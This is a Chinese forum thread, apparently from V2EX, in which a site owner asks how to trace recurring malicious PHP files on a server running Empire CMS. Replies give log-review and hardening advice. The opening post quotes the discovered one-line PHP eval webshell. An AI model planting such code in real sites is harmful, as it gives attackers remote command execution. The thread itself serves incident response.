服务器大神来支招,网站被挂马!

2017-06-29 18:11:50 +08:00
 ningcool

网站隔几天就会在 web 的一些目录下生成垃圾.php 的脚本文件。比如最近的一个 php 文件:

< php ? php @ eval ( $_POST [ 'cmd ']) ; ? >

只有这么一句话的恶意脚本。

我的服务器在阿里云,也买了安骑士杀毒,但是只能检测到恶意脚本,并隔离,但具体这些脚本怎么生成的无法得知,因为隔离了,几天后又有新的垃圾脚本生成。也就是我的 linux 系统里是不是有后门,怎么揪出来? 还请各位服务器大神给点建议,指点迷津。

12750 次点击
所在节点    Linux
104 条回复
H3x
2017-06-30 11:14:58 +08:00
ningcool
2017-06-30 11:16:36 +08:00
@H3x 这个漏洞需要后台密码。难道我的后台密码泄漏了?
ningcool
2017-06-30 11:17:08 +08:00
@wooyuntest 具体怎么拿到 shell 的?
zooandzoo
2017-06-30 11:18:53 +08:00
开先看文件修改时间,再看服务器访问日志,在日志里搜索相关文件名看它是怎么执行的,帝国 CMS 在国产 CMS 里算是比较安全的,虽然说现在不更新了。
bravecarrot
2017-06-30 11:23:37 +08:00
同 33 楼 发出访问日志 木马文件生成日期前后的部分
这种 cms 漏洞一大堆
一般是:
看 cms 版本,查漏洞,有漏洞,over ;没漏洞,下载来源代码,自己挖。要是没什么深仇大恨,没人会闲着没事挖你程序的漏洞
msg7086
2017-06-30 12:22:47 +08:00
楼上也别瞎推荐 Windows Server 了。连 Linux 都搞不定,你让他去搞 Windows ?
LioMore
2017-06-30 12:24:02 +08:00
帝国 CMS 让我联想到国内那些屎一样的程序和程序员
coolypf
2017-06-30 12:47:54 +08:00
lz 有点顽固啊,听不进大家的意见。
neroxps
2017-06-30 13:02:49 +08:00
@coolypf 主要是楼主那句 **业界公认**
ningcool
2017-06-30 13:21:45 +08:00
@LioMore 你对帝国 CMS 为啥这么有偏见呢 哈哈! 用过的人都觉得好!
ryannnnn
2017-06-30 13:41:15 +08:00
日志放着干什么吃的,看看文件生成时间附近的日志
ym1ng
2017-06-30 13:50:46 +08:00
看了一下楼主主页 好像是 360 的 这个时候不是应该去找信息安全部和安服的大佬聊一聊看看这个帝国 cms 到底有多少漏洞吗?(逃
surfire91
2017-06-30 13:55:21 +08:00
楼主能不能把贵站地址报出来
aksoft
2017-06-30 14:03:05 +08:00
@surfire91 然后分享一下,大家用来做图床。。。
anyclue
2017-06-30 15:13:07 +08:00
我怎么感觉楼上一堆傻逼,楼主你 ecms 用的什么版本的?还有各位为什么不可能是 Linux 服务器的问题呢?
liwl
2017-06-30 15:14:40 +08:00
@ningcool 用过的人都觉得好?保重
yghack
2017-06-30 15:15:28 +08:00
先看一下开放的端口
是不是有 redis
mysql 是不是有弱密码
再看看进程和计划任务
jarlyyn
2017-06-30 15:16:51 +08:00
@anyclue

因为放这种木马就是为了得到系统的控制权。

窗被小偷锯了,一般不会去怀疑是不是小偷用钥匙开了门从里面锯的。
surfire91
2017-06-30 15:24:37 +08:00
@anyclue
有啥不可能的?当然有可能是 Linux 服务器的问题。
但是槽点不是楼主觉得帝国 CMS 不可能有问题吗?
yw9381
2017-06-30 15:26:42 +08:00
@ningcool 帝国 cms 也就国内用的多,出了国门基本没人用,wordpress 已经是世界第一大开源 cms 了,举个最简单的例子,wordpress 自身的漏洞是可以拿到 CVE 编号的,帝国的漏洞不可能拿到,原因就是影响力,你的眼界只局限在国内站长圈子当然觉得帝国好了,在我们这些做安全的人眼里,帝国和 wordpress 不是一个量级上的东西,不可相提并论。
对于漏洞,个人觉得应该是帝国自身或是插件的问题导致被上了 shell,漏洞不修补,这些 shell 也就是发几个 http 包的事情,我个人觉得,服务器有没有被提权先不表,肯定是有一个守护式进程一样的东西,要么在你服务器里面(类似于定时任务自动写入),要么在对方攻击机(对方定时过来发个包)那边,建议先自查 http 日志,看下什么时候谁访问了这个 php shell,记录 IP,给 ban 掉,日志的上下文有没有其他看起来比较可疑的访问请求,跟着访问一次,模拟一下当时的过程,如果有的话最好抓包,有流量就可以复现攻击过程,一点一点查,总会找到源头的

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/371985

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX